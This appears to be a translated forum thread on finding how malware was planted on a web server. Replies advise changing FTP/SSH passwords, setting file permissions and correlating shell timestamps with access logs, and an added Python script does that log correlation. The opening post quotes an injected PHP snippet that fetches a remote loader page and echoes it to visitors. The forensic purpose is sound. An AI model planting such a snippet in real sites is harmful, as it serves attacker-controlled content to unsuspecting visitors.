They hesitated to plant malware on the server. How to catch the entry point?
$url = "http://example.com/×××××/loader.html";
$code = @file_get_contents ($url);
echo $code;
Usually FTP or SSH. Did you change these passwords? If not, then change them.
If there is a hole in the code somewhere, then the task is also simply solved by setting the necessary rights on files and directories: no one can write in PHP, and the upload of a new file is easy to track.
It seems to me that it all climbs in through ftp / sh, etc., in normal mode from ordinary client machines. This is the easiest way, obviously.
In my humble experience: bots do this through already known holes in Joomla / phpBB / etc., upload a phpshell and go on from there. As a rule, infection occurs at about the same time as the upload of the shell, and the shell is not removed. Therefore, you need to look at the time of editing / creating dubious files, look in the web server logs for access to unusual URLs during this period, and look for the desired shell there. After finding the shell, look at the time of its creation and look in the logs for a request to the web server at exactly that time, in order to find which URL was requested to activate the hole and download the shell through it.
Well, as one of the options.
Read the logs, they rulez. And not just Web servers. Once in /var/log/messages (if my memory serves me) I came across messages from wget, which was launched to upload a file. In time, I then went through access.log and found the URI of the script, into which the bug was substituted in advance.
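The correlation described in the answers above (take the timestamp of the suspicious file, then pull the web-server requests made around that moment), as an added example that is not part of the original thread. It assumes the Apache/nginx combined log format; the log lines, addresses and paths are constructed.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log line (assumed format).
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def parse(line):
    """Return (time, ip, method, uri, status) or None for unparseable lines."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, uri, status = m.groups()
    try:
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return when, ip, method, uri, int(status)

def requests_near(log_lines, when, window=120):
    """Requests within +/- window seconds of `when`, most suspicious first."""
    delta = timedelta(seconds=window)
    hits = [r for r in map(parse, log_lines) if r and abs(r[0] - when) <= delta]
    # POSTs and URIs with a query string are the usual way a hole is triggered;
    # sort them ahead of plain GETs, then by distance from the file time.
    return sorted(hits, key=lambda r: (r[2] != "POST" and "?" not in r[3],
                                       abs(r[0] - when)))

def file_time(path):
    """mtime of a suspicious file as an aware UTC datetime."""
    return datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)

# Constructed sample log lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2012:03:10:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2012:04:17:40 +0000] "GET /forum/viewtopic.php?t=1 HTTP/1.1" 200 812 "-" "curl"',
    '203.0.113.9 - - [12/Mar/2012:04:17:58 +0000] "POST /components/com_example/upload.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.9 - - [12/Mar/2012:04:18:05 +0000] "GET /images/sh.php HTTP/1.1" 200 4410 "-" "-"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    # Constructed: pretend the shell's timestamp is 04:18:00 UTC; on a real
    # host use file_time("/path/to/suspicious.php") instead.
    shell_time = datetime(2012, 3, 12, 4, 18, 0, tzinfo=timezone.utc)
    for when, ip, method, uri, status in requests_near(SAMPLE_LOG, shell_time):
        print(when.isoformat(), ip, method, uri, status)
```

The modification time can be reset by whoever wrote the file, so compare it with the inode change time (`os.stat(path).st_ctime`) before trusting the window.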